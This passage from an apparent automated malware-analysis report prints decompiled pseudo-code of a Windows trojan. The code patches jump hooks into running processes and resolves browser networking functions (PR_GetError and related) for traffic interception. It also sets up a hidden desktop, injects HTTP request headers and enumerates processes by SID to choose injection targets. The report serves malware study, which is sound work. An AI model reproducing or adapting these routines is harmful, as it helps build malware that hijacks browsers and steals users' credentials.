    							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
    							E0040AFD0(_t124,  &_v1292,  &_v12, 1);
    						}
    					}
    					goto L14;
    				}
    			}
    0x0040b1fe
    0x0040b1fe
    0x0040b212
    0x0040b21f
    0x0040b220
    0x0040b22a
    0x0040b22b
    0x0040b240
    0x0040b24b
    0x0040b253
    0x0040b255
    0x0040b257
    0x0040b264
    0x0040b275
    0x0040b281
    0x0040b281
    0x0040b257
    0x0040b287
    0x0040b28c
    0x0040b3ac
    0x0040b3ac
    0x00000000
    0x0040b292
    0x0040b297
    0x0040b298
    0x0040b2a5
    0x0040b2a6
    0x0040b2ad
    0x0040b2b0
    0x0040b2b1
    0x0040b2b9
    0x0040b2c2
    0x0040b2c7
    0x0040b2ce
    0x0040b2d5
    0x0040b2dc
    0x0040b2e3
    0x0040b2e6
    0x0040b2e6
    0x0040b2f7
    0x0040b2ff
    0x0040b301
    0x0040b304
    0x0040b312
    0x0040b319
    0x0040b319
    0x0040b332
    0x0040b335
    0x0040b33b
    0x0040b33b
    0x0040b340
    0x0040b341
    0x0040b34a
    0x0040b3b0
    0x0040b3b0
    0x00000000
    0x0040b3c7
    0x0040b3b5
    0x00000000
    0x0040b3bd
    0x0040b354
    0x0040b355
    0x0040b35f
    0x0040b360
    0x0040b370
    0x0040b37b
    0x0040b383
    0x0040b385
    0x0040b387
    0x0040b394
    0x0040b3a7
    0x0040b3a7
    0x0040b387
    0x00000000
    0x0040b383

    APIs
      • Part of subcall function 0041A4CC: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0040E535,?,?,00000104,.exe,00000000), ref: 0041A4E1
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0040B264
      • Part of subcall function 0040B012: GetPrivateProfileStringW.KERNEL32 ref: 0040B049
      • Part of subcall function 0040B012: StrStrIW.SHLWAPI(?,?), ref: 0040B0D1
      • Part of subcall function 0040B012: StrStrIW.SHLWAPI(?,?), ref: 0040B0E2
      • Part of subcall function 0040B012: GetPrivateProfileStringW.KERNEL32 ref: 0040B0FE
      • Part of subcall function 0040B012: GetPrivateProfileStringW.KERNEL32 ref: 0040B11C
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 0040B281
      • Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 0040B2F7
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 0040B394
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
    • String ID: #$$$&
    • API String ID: 1517737059-1941049543
    • Opcode ID: a96cba2b15fc9284fb6d7b5c8e441db219eaa6cc77a70741e7d617f0b3b8792f
    • Instruction ID: f2b1e163377e4992b5c0651f544e42c013a560d9533b293701ea2a4c068c3350
    • Opcode Fuzzy Hash: a96cba2b15fc9284fb6d7b5c8e441db219eaa6cc77a70741e7d617f0b3b8792f
    • Instruction Fuzzy Hash: 37511D72E00219AADF21EAA1DC49FDFB7BCEB04314F1005B7B508F7181D7789A858B99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0041ABE4(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, char _a8) {
    				char _v8;
    				DWORD* _v12;
    				intOrPtr _v47;
    				void _v48;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t48;
    				void* _t59;
    				intOrPtr _t62;
    				void* _t64;
    				intOrPtr* _t67;
    				long _t69;
    				DWORD* _t70;
    				void* _t72;
    
    				_t64 = __edx;
    				_t62 = __ecx;
    				_t59 = __eax;
    				_t70 = 0;
    				_v12 = 0;
    				if(E0041AB9F(_a4) < 0x1e) {
    					L18:
    					return _v12;
    				}
    				_t3 =  &_v8; // 0x40e974
    				if(VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40, _t3) == 0) {
    					goto L18;
    				}
    				E0041645B( &_v48,  &_v48, 0xffffff90, 0x23);
    				if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
    					L17:
    					_t31 =  &_v8; // 0x40e974
    					_t32 =  &_v8; // 0x40e974
    					VirtualProtectEx(0xffffffff, _a4, 0x1e,  *_t32, _t31);
    					goto L18;
    				} else {
    					_t67 =  &_v48;
    					_push(0);
    					_push(_t67);
    					while(1) {
    						_t48 = E0041D900(_t59, _t62, _t64, _t67, _t70);
    						if(_t48 == 0xffffffff) {
    							break;
    						}
    						_t70 = _t70 + _t48;
    						if(_t70 > 0x1e) {
    							L16:
    							goto L17;
    						}
    						_t62 =  *_t67;
    						if(_t62 == 0xe9 || _t62 == 0xe8) {
    							if(_t48 == 5) {
    								_t10 =  &_a8; // 0x422020
    								 *((intOrPtr*)(_t67 + 1)) =  *((intOrPtr*)(_t67 + 1)) + _a4 -  *_t10;
    							}
    						}
    						_push(0);
    						if(_t70 >= 5) {
    							_t16 =  &_a8; // 0x422020
    							_t17 = _t70 + 5; // 0x5
    							_t69 = _t17;
    							 *((intOrPtr*)(_t72 + _t70 - 0x2b)) = _a4 -  *_t16 - 5;
    							_t21 =  &_a8; // 0x422020
    							 *((char*)(_t72 + _t70 - 0x2c)) = 0xe9;
    							if(WriteProcessMemory(0xffffffff,  *_t21,  &_v48, _t69, ??) != 0) {
    								_v48 = 0xe9;
    								_v47 = _t59 - _a4 - 5;
    								E0041568B(_a4, _a8);
    								if(WriteProcessMemory(0xffffffff, _a4,  &_v48, 5, 0) != 0) {
    									_v12 = _t69;
    								}
    							}
    							goto L16;
    						}
    						_t67 = _t72 + _t70 - 0x2c;
    						_push(_t67);
    					}
    					goto L16;
    				}
    			}
    0x0041abe4
    0x0041abe4
    0x0041abec
    0x0041abf1
    0x0041abf3
    0x0041abfe
    0x0041acfa
    0x0041ad00
    0x0041ad00
    0x0041ac04
    0x0041ac19
    0x00000000
    0x00000000
    0x0041ac27
    0x0041ac40
    0x0041ace6
    0x0041ace6
    0x0041acea
    0x0041acf4
    0x00000000
    0x0041ac46
    0x0041ac47
    0x0041ac4a
    0x0041ac4d
    0x0041ac81
    0x0041ac81
    0x0041ac89
    0x00000000
    0x00000000
    0x0041ac50
    0x0041ac55
    0x0041ace5
    0x00000000
    0x0041ace5
    0x0041ac5b
    0x0041ac60
    0x0041ac6a
    0x0041ac6f
    0x0041ac72
    0x0041ac72
    0x0041ac6a
    0x0041ac75
    0x0041ac7a
    0x0041ac90
    0x0041ac93
    0x0041ac93
    0x0041ac99
    0x0041aca2
    0x0041aca5
    0x0041acb6
    0x0041acc3
    0x0041acc7
    0x0041acca
    0x0041ace0
    0x0041ace2
    0x0041ace2
    0x0041ace0
    0x00000000
    0x0041acb6
    0x0041ac7c
    0x0041ac80
    0x0041ac80
    0x00000000
    0x0041ac8b

    APIs
      • Part of subcall function 0041AB9F: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,0041562B,00000000,00000000,00000034,004159B6,00422020,00000000), ref: 0041ABB4
    • VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,t@,-00000008,00000034,?,?,0041574C,?,00000000,?,?,004159B6,00422020), ref: 0041AC11
    • ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,0041574C,?,00000000,?,?,004159B6), ref: 0041AC38
    • WriteProcessMemory.KERNEL32(000000FF, B,?,00000005,00000000,?,00000000,00000000,?,?,0041574C,?,00000000,?,?,004159B6), ref: 0041ACB2
    • WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000,?,?,0041574C,?,00000000,?,?,004159B6,00422020,00000000,0040E974), ref: 0041ACDC
    • VirtualProtectEx.KERNEL32(000000FF,?,0000001E,t@,t@,?,?,0041574C,?,00000000,?,?,004159B6,00422020,00000000,0040E974), ref: 0041ACF4
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
    • String ID: B$t@
    • API String ID: 390532180-3118262274
    • Opcode ID: 3e6bba40491de74e9769631c182a4a7d2de31922bd843b98d0fd6a834c51b6bd
    • Instruction ID: cc693e854351c75c522ebbc96656baf05a20c231da4a7ec70e99dea665d51bf5
    • Opcode Fuzzy Hash: 3e6bba40491de74e9769631c182a4a7d2de31922bd843b98d0fd6a834c51b6bd
    • Instruction Fuzzy Hash: 09316272900208AFDF109FB8CD44EDE7B69AB09370F108316F925A61D0D634D5908BA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00412B09(struct HINSTANCE__* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				_Unknown_base(*)()* _t12;
    				struct HINSTANCE__* _t14;
    
    				 *0x423098 =  *0x423098 & 0x00000000;
    				 *0x42309c =  *0x42309c & 0x00000000;
    				_t14 = __eax;
    				InitializeCriticalSection(0x42307c);
    				 *0x423094 = _a4;
    				 *0x423070 = _a8;
    				 *0x4230a0 = _a12;
    				 *0x423074 = _t14;
    				 *0x42306c = _a16;
    				 *0x423068 = GetProcAddress(_t14, "PR_GetNameForIdentity");
    				 *0x423078 = GetProcAddress( *0x423074, "PR_SetError");
    				_t12 = GetProcAddress( *0x423074, "PR_GetError");
    				 *0x423064 = _t12;
    				return _t12;
    			}

    Instruction address range for the listing above: 0x00412b09 to 0x00412b87 (the per-line address column was separated from the code during extraction).

    APIs
    • InitializeCriticalSection.KERNEL32(0042307C,74B04EE0,00415A26,00422360), ref: 00412B1F
    • GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 00412B5B
    • GetProcAddress.KERNEL32(PR_SetError), ref: 00412B6D
    • GetProcAddress.KERNEL32(PR_GetError), ref: 00412B7F
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: AddressProc$CriticalInitializeSection
    • String ID: PR_GetError$PR_GetNameForIdentity$PR_SetError
    • API String ID: 2804437462-2578621715
    • Opcode ID: 4bee4486cb426aa557b90688aa627cb1b9d2ffe426d5e80124e30cbda71cb939
    • Instruction ID: 31a6dd2cad711d4407113bc64ac16d520dd87ac287238e740d4950e58f1274ec
    • Opcode Fuzzy Hash: 4bee4486cb426aa557b90688aa627cb1b9d2ffe426d5e80124e30cbda71cb939
    • Instruction Fuzzy Hash: 6D0196B4B05310AFD720DF78ED49A057FF0A748762B90497AA648A3268D37C9546CF6C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E0040D90B(void* __edx, intOrPtr* _a4) {
    				char _v524;
    				char _v544;
    				char _v556;
    				intOrPtr _v572;
    				char _v924;
    				char _v1028;
    				char _v1040;
    				char _v1060;
    				intOrPtr _v1104;
    				intOrPtr _v1108;
    				intOrPtr _v1112;
    				intOrPtr _v1116;
    				char _v1120;
    				char* _v1124;
    				intOrPtr _v1128;
    				char _v1132;
    				intOrPtr _v1144;
    				signed short _v1146;
    				char _v1148;
    				signed int _v1152;
    				signed int _v1156;
    				char _v1157;
    				signed int _v1160;
    				void* _v1164;
    				void* _v1168;
    				char _v1177;
    				char _v1180;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t59;
    				void* _t62;
    				signed int _t71;
    				char _t77;
    				char* _t85;
    				char _t88;
    				char _t95;
    				short _t100;
    				intOrPtr* _t105;
    				void* _t111;
    				char _t112;
    				signed int _t118;
    				signed int _t119;
    				void* _t123;
    
    				_t111 = __edx;
    				_t105 = _a4;
    				_t59 =  *(_t105 + 4);
    				_push(_t118);
    				_t119 = _t118 | 0xffffffff;
    				_v1152 = _t119;
    				_v1156 = _t119;
    				if(_t59 == _t119 || _t59 == 0xfffffffe) {
    					L4:
    					_t62 = E00416A27( *((intOrPtr*)( *_t105 + 8)), _t108, 0);
    					_t109 =  *_t105;
    					_t63 = E00419431(_t62,  *_t105,  *((intOrPtr*)( *_t105 + 4)));
    					_v1160 = _t63;
    					_t133 = _t63 - _t119;
    					if(_t63 == _t119) {
    						goto L20;
    					}
    					E004197A3(_t109, _t63);
    					E00419761(_v1160);
    					_push(_t105 + 8);
    					_push(3);
    					_push(_v1164);
    					_t123 = 4;
    					if(E0041CA42(_t109, _t123, _t133) == 0) {
    						goto L20;
    					}
    					_t71 =  *(_t105 + 4);
    					if(_t71 == 0xfffffffe) {
    						SetThreadPriority(GetCurrentThread(), 1);
    						E0040ED80(0x2937498d,  &_v1028, 0);
    						_t63 = E00404C67(_t109, __eflags,  &_v1040);
    						__eflags = _t63;
    						if(_t63 == 0) {
    							goto L20;
    						}
    						_t77 = E00407CD9(_t109, _t111,  &_v924, 1);
    						__eflags = _t77;
    						if(_t77 == 0) {
    							L19:
    							_t63 = E00407F44( &_v924, 1);
    							goto L20;
    						} else {
    							__imp__GetShellWindow();
    							__eflags = _t77;
    							_v1157 = _t77 != 0;
    							__eflags = _v1157;
    							if(_v1157 == 0) {
    								E0040FA33(0xa8,  &_v1132);
    								_t85 =  &_v524;
    								__imp__SHGetFolderPathW(0, 0x25, 0, 0, _t85);
    								__eflags = _t85;
    								if(_t85 == 0) {
    									_t88 = E0041BC2F( &_v1132,  &_v544,  &_v544);
    									__eflags = _t88;
    									if(_t88 != 0) {
    										_t112 = 0x44;
    										E0041645B( &_v1120,  &_v1120, 0, _t112);
    										_v1124 =  &_v1060;
    										_v1132 = _t112;
    										_t95 = E00417C6F( &_v556, 0, 0,  &_v1132,  &_v1180);
    										__eflags = _t95;
    										if(_t95 != 0) {
    											WaitForSingleObject(_v1168, 0x1388);
    											CloseHandle(_v1164);
    											CloseHandle(_v1168);
    											_v1177 = 1;
    										}
    									}
    								}
    							}
    							SystemParametersInfoW(0x1003, 0, 0, 0);
    							__eflags = _v1157 - 1;
    							if(__eflags == 0) {
    								_v1132 =  &_v924;
    								_v1128 = 0x408153;
    								_v1124 = 0x408156;
    								_v1120 = E00408159;
    								_v1116 = E0040817D;
    								_v1112 = E004081C4;
    								_v1108 = E004081F9;
    								_v1104 = 0x408153;
    								E00410F8B(__eflags, _v1156,  &_v1132, _v924, _v572);
    							}
    							goto L19;
    						}
    					} else {
    						if(_t71 == 0xffffffff) {
    							_t63 = E00406C39(_v1156, _t109);
    						} else {
    							_push(_v1152);
    							_t63 = E004195A4(_v1156);
    							_t105 = _a4;
    						}
    						goto L20;
    					}
    				} else {
    					_t100 = 2;
    					_v1148 = _t100;
    					_t108 =  *(_t105 + 4) << 8;
    					_v1146 =  *(_t105 + 5) & 0x000000ff |  *(_t105 + 4) << 0x00000008;
    					_v1144 = 0x100007f;
    					_t63 = E004193F0( &_v1148);
    					_v1152 = _t63;
    					if(_t63 == _t119) {
    						L20:
    						E0041974B(E0041974B(_t63, _v1156), _v1152);
    						E004163A8(_t105);
    						return 0;
    					} else {
    						E004197A3(_t108, _t63);
    						goto L4;
    					}
    				}
    			}

    Instruction address range for the listing above: 0x0040d90b to 0x0040db91 (the per-line address column was separated from the code during extraction).

    APIs
      • Part of subcall function 004193F0: socket.WS2_32(?,00000001,00000006), ref: 004193F9
      • Part of subcall function 004193F0: connect.WS2_32(00000000,?,-0000001D), ref: 00419419
      • Part of subcall function 004193F0: closesocket.WS2_32(00000000), ref: 00419424
      • Part of subcall function 004197A3: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 004197B9
    • GetCurrentThread.KERNEL32 ref: 0040D9F0
    • SetThreadPriority.KERNEL32(00000000), ref: 0040D9F7
      • Part of subcall function 00404C67: OpenWindowStationW.USER32 ref: 00404C8C
      • Part of subcall function 00404C67: CreateWindowStationW.USER32 ref: 00404C9F
      • Part of subcall function 00404C67: GetProcessWindowStation.USER32 ref: 00404CB0
      • Part of subcall function 00404C67: OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 00404CEB
      • Part of subcall function 00404C67: CreateDesktopW.USER32 ref: 00404CFF
      • Part of subcall function 00404C67: GetCurrentThreadId.KERNEL32 ref: 00404D0B
      • Part of subcall function 00404C67: GetThreadDesktop.USER32(00000000), ref: 00404D12
      • Part of subcall function 00404C67: SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 00404D24
      • Part of subcall function 00404C67: CloseDesktop.USER32(00000000,00000000,00000000), ref: 00404D36
      • Part of subcall function 00404C67: CloseWindowStation.USER32(?,?), ref: 00404D51
      • Part of subcall function 00407CD9: TlsAlloc.KERNEL32(004228E0,00000000,0000018C,00000000,00000000), ref: 00407CF2
    • GetShellWindow.USER32 ref: 0040DA3D
    • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?), ref: 0040DA70
      • Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E
    • WaitForSingleObject.KERNEL32(00000000,00001388,?,00000000,00000000,?,00000044,?,00000000,00000044,?,?), ref: 0040DAD2
    • CloseHandle.KERNEL32(?), ref: 0040DAE2
    • CloseHandle.KERNEL32(?), ref: 0040DAE8
    • SystemParametersInfoW.USER32 ref: 0040DAF7
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: DesktopThreadWindow$CloseStation$CreateCurrentHandleOpenPath$AllocCombineFolderInfoObjectParametersPriorityProcessShellSingleSystemWaitclosesocketconnectsetsockoptsocket
    • String ID:
    • API String ID: 1240616959-0
    • Opcode ID: 02587d2689c24fb410d13aca5f39a87ed65dfdb03741e704503fb59cc83800b5
    • Instruction ID: 6600717c92694b0693ee519b18725b1fdcc1cbb36cd93e7df23ee735fdc730ed
    • Opcode Fuzzy Hash: 02587d2689c24fb410d13aca5f39a87ed65dfdb03741e704503fb59cc83800b5
    • Instruction Fuzzy Hash: 9E61AF705083419FD720EFA5C985E9FBBE8EF84704F00492EF594A72A1D778D849CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040771F(void* __ecx, void* __eflags, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
    				signed char* _v20;
    				void* _v24;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				void* _v48;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				char _v76;
    				void* _v80;
    				void* _v108;
    				signed int _v120;
    				signed int _v124;
    				char _v128;
    				void* _v129;
    				void* _v132;
    				void* _v140;
    				signed int _v176;
    				void* _v177;
    				intOrPtr _v180;
    				void* _v184;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed char _t85;
    				signed int _t88;
    				intOrPtr _t89;
    				void* _t92;
    				void* _t96;
    				void* _t100;
    				signed int _t107;
    				intOrPtr _t108;
    				intOrPtr _t111;
    				intOrPtr _t113;
    				intOrPtr _t114;
    				intOrPtr _t115;
    				intOrPtr _t116;
    				intOrPtr _t117;
    				intOrPtr _t118;
    				signed char* _t119;
    				signed int _t120;
    				struct _CRITICAL_SECTION* _t126;
    				intOrPtr _t131;
    				char* _t138;
    				char* _t139;
    				char* _t140;
    				signed int _t142;
    				signed int _t148;
    				signed int _t151;
    				void* _t153;
    
    				_t153 = (_t151 & 0xfffffff8) - 0x7c;
    				_v120 = _v120 | 0xffffffff;
    				_t122 =  &_v76;
    				if(E00407604( &_v76, __ecx, __eflags, _a4,  *_a8,  *_a12) == 0) {
    					L23:
    					E004152C2( &_v76);
    					return _v120;
    				}
    				_t85 = E00414994(_t122);
    				_v120 = _t85;
    				if((1 & _t85) == 0) {
    					__eflags = _t85 & 0x00000002;
    					if((_t85 & 0x00000002) == 0) {
    						_t126 = 0x4228c0;
    						L18:
    						__eflags =  *(_t153 + 0x18) & 0x00000004;
    						if(( *(_t153 + 0x18) & 0x00000004) == 0) {
    							goto L23;
    						}
    						 *_a8 = _v40;
    						 *_a12 =  *((intOrPtr*)(_t153 + 0x68));
    						EnterCriticalSection(_t126);
    						_t146 = _a4;
    						_t88 = E00406C86(_a4);
    						__eflags = _t88 - 0xffffffff;
    						if(_t88 != 0xffffffff) {
    							L21:
    							_t89 =  *0x4228d8; // 0x0
    							_t148 = _t88 * 0x24;
    							__eflags = _t148;
    							E004163A8( *((intOrPtr*)(_t148 + _t89 + 8)));
    							_t131 =  *0x4228d8; // 0x0
    							 *((intOrPtr*)(_t148 + _t131 + 8)) = _v44;
    							L22:
    							LeaveCriticalSection(_t126);
    							goto L23;
    						}
    						_t88 = E00406CAC(_t88, _t146);
    						__eflags = _t88 - 0xffffffff;
    						if(_t88 == 0xffffffff) {
    							goto L22;
    						}
    						goto L21;
    					}
    					_v124 = _v124 & 0x00000000;
    					 *(_t153 + 0xf) = 1;
    					__eflags =  *((intOrPtr*)(_t153 + 0x7c)) - 1;
    					if( *((intOrPtr*)(_t153 + 0x7c)) != 1) {
    						L9:
    						_t138 = _t153 + 0x28;
    						_t92 = 0x21;
    						E0040F9FD(_t92, _t138);
    						HttpAddRequestHeadersA(_a4, _t138, 0xffffffff, 0xa0000000);
    						_t139 =  &_v128;
    						_t96 = 0x22;
    						E0040F9FD(_t96, _t139);
    						HttpAddRequestHeadersA(_a4, _t139, 0xffffffff, 0x80000000);
    						_t140 = _t153 + 0x28;
    						_t100 = 0x23;
    						E0040F9FD(_t100, _t140);
    						HttpAddRequestHeadersA(_a4, _t140, 0xffffffff, 0x80000000);
    						L10:
    						_t126 = 0x4228c0;
    						EnterCriticalSection(0x4228c0);
    						__eflags =  *(_t153 + 0xf);
    						if( *(_t153 + 0xf) == 0) {
    							L14:
    							E0041532C( *((intOrPtr*)(_t153 + 0x80)), _v68);
    							__eflags = _v176;
    							if(_v176 != 0) {
    								E00418035( *((intOrPtr*)(_t153 + 0x10)));
    							}
    							L16:
    							LeaveCriticalSection(_t126);
    							goto L18;
    						}
    						_t150 = _a4;
    						_t107 = E00406C86(_a4);
    						__eflags = _t107 - 0xffffffff;
    						if(_t107 != 0xffffffff) {
    							L13:
    							_t108 =  *0x4228d8; // 0x0
    							_t142 = _t107 * 0x24;
    							E0041532C( *((intOrPtr*)(_t108 + _t142 + 0x10)),  *((intOrPtr*)(_t108 + _t142 + 0xc)));
    							_t111 =  *0x4228d8; // 0x0
    							E004163A8( *((intOrPtr*)(_t142 + _t111 + 0x14)));
    							_t113 =  *0x4228d8; // 0x0
    							 *(_t142 + _t113 + 0x14) =  *(_t142 + _t113 + 0x14) & 0x00000000;
    							_t114 =  *0x4228d8; // 0x0
    							 *(_t142 + _t114 + 0x1c) =  *(_t142 + _t114 + 0x1c) & 0x00000000;
    							_t115 =  *0x4228d8; // 0x0
    							 *(_t142 + _t115 + 0x18) =  *(_t142 + _t115 + 0x18) | 0xffffffff;
    							_t116 =  *0x4228d8; // 0x0
    							 *((intOrPtr*)(_t142 + _t116 + 0xc)) = _v76;
    							_t117 =  *0x4228d8; // 0x0
    							 *((intOrPtr*)(_t142 + _t117 + 0x10)) = _v72;
    							_t118 =  *0x4228d8; // 0x0
    							 *((intOrPtr*)(_t142 + _t118 + 0x20)) = _v180;
    							goto L16;
    						}
    						_t107 = E00406CAC(_t107, _t150);
    						__eflags = _t107 - 0xffffffff;
    						if(_t107 == 0xffffffff) {
    							goto L14;
    						}
    						goto L13;
    					}
    					_t119 = _v20;
    					__eflags =  *_t119 & 0x00000003;
    					if(( *_t119 & 0x00000003) == 0) {
    						goto L9;
    					}
    					_t120 = E00415587(_t119,  &_v76);
    					_v124 = _t120;
    					__eflags = _t120;
    					if(_t120 != 0) {
    						_v120 = 1;
    					} else {
    						 *(_t153 + 0xf) = _t120;
    					}
    					goto L10;
    				} else {
    					SetLastError(0x2f78);
    					_v120 = _v120 & 0x00000000;
    					goto L23;
    				}
    			}

    Instruction address range for the listing above: 0x00407725 to 0x00407943 (the per-line address column was separated from the code during extraction).

    APIs
      • Part of subcall function 00414994: EnterCriticalSection.KERNEL32(00423124,?,?,?), ref: 004149AF
      • Part of subcall function 00414994: LeaveCriticalSection.KERNEL32(00423124,?,?,?), ref: 00414A32
    • SetLastError.KERNEL32(00002F78,?), ref: 00407766
    • EnterCriticalSection.KERNEL32(004228C0), ref: 0040780D
    • LeaveCriticalSection.KERNEL32(004228C0,?), ref: 004078C3
    • EnterCriticalSection.KERNEL32(004228C0,?), ref: 004078EA
    • LeaveCriticalSection.KERNEL32(004228C0,?), ref: 0040792A
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$ErrorLast
    • String ID:
    • API String ID: 486337731-0
    • Opcode ID: 772eec96d0937bf82672633e68713a890c36450c698829ee003733d46d82dd04
    • Instruction ID: 6c4999b05ff59d76d5a631eee67b5516f628b524d45ddcada9161565492acc27
    • Opcode Fuzzy Hash: 772eec96d0937bf82672633e68713a890c36450c698829ee003733d46d82dd04
    • Instruction Fuzzy Hash: FC517271508345ABD721EF28D944A5A7BE1FF84364F50462EF864A72F1C734E885CB8A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00415AB4() {
    				char _v5;
    				signed int _v12;
    				signed int _v16;
    				void* _v20;
    				int _v24;
    				void* _v28;
    				char _v32;
    				long _v588;
    				void* _v596;
    				void* __esi;
    				void* _t42;
    				struct tagPROCESSENTRY32W* _t45;
    				signed int _t47;
    				void* _t48;
    				long _t56;
    				intOrPtr* _t57;
    				void** _t59;
    				void** _t60;
    				void** _t62;
    				long _t65;
    				int _t71;
    				void** _t72;
    				void* _t73;
    
    				_t71 = 0;
    				_v5 = 0;
    				_v16 = 0;
    				_v12 = 0;
    				while(1) {
    					_t42 = CreateToolhelp32Snapshot(2, _t71);
    					_v20 = _t42;
    					_v24 = _t71;
    					if(_t42 == 0xffffffff) {
    						break;
    					} else {
    						_t45 =  &_v596;
    						_v596 = 0x22c;
    						Process32FirstW(_v20, _t45);
    					}
    					while(_t45 != 0) {
    						_t65 = _v588;
    						__eflags = _t65 - _t71;
    						if(_t65 <= _t71) {
    							L20:
    							_t45 = Process32NextW(_v20,  &_v596);
    							continue;
    						}
    						__eflags = _t65 -  *0x422e08; // 0x0
    						if(__eflags == 0) {
    							goto L20;
    						}
    						_t47 = 0;
    						__eflags = _v12 - _t71;
    						if(_v12 <= _t71) {
    							L8:
    							_t48 = E0040ED0F(_t65, _t70, _t65);
    							_v28 = _t48;
    							__eflags = _t48 - _t71;
    							if(_t48 == _t71) {
    								goto L20;
    							}
    							_t73 = OpenProcess(0x400, _t71, _v588);
    							__eflags = _t73 - _t71;
    							if(_t73 == _t71) {
    								L19:
    								CloseHandle(_v28);
    								goto L20;
    							}
    							_t72 = E004179BF(_t65, _t73,  &_v32);
    							CloseHandle(_t73);
    							__eflags = _t72;
    							if(_t72 == 0) {
    								L18:
    								_t71 = 0;
    								__eflags = 0;
    								goto L19;
    							} else {
    								__eflags = _v32 -  *0x422ba8; // 0x0
    								if(__eflags == 0) {
    									_t56 = GetLengthSid( *_t72);
    									__eflags = _t56 -  *0x422ba0;
    									if(_t56 ==  *0x422ba0) {
    										_t57 =  *0x422b9c; // 0x0
    										_t59 = E00416419( *_t57,  *_t72, _t56);
    										__eflags = _t59;
    										if(_t59 == 0) {
    											_t60 = E00416333(4 + _v12 * 4,  &_v16);
    											__eflags = _t60;
    											if(_t60 != 0) {
    												_t70 = _v12;
    												_v12 = _v12 + 1;
    												_v24 = _v24 + 1;
    												 *((intOrPtr*)(_v16 + _v12 * 4)) = _v588;
    												_t62 = E00415A2B(_v16, _v588, _v28);
    												__eflags = _t62;
    												if(_t62 != 0) {
    													_v5 = 1;
    												}
    											}
    										}
    									}
    								}
    								E004163A8(_t72);
    								goto L18;
    							}
    						} else {
    							goto L6;
    						}
    						while(1) {
    							L6:
    							_t70 = _v16;
    							__eflags =  *((intOrPtr*)(_t70 + _t47 * 4)) - _t65;
    							if( *((intOrPtr*)(_t70 + _t47 * 4)) == _t65) {
    								goto L20;
    							}
    							_t47 = _t47 + 1;
    							__eflags = _t47 - _v12;
    							if(_t47 < _v12) {
    								continue;
    							}
    							goto L8;
    						}
    						goto L20;
    					}
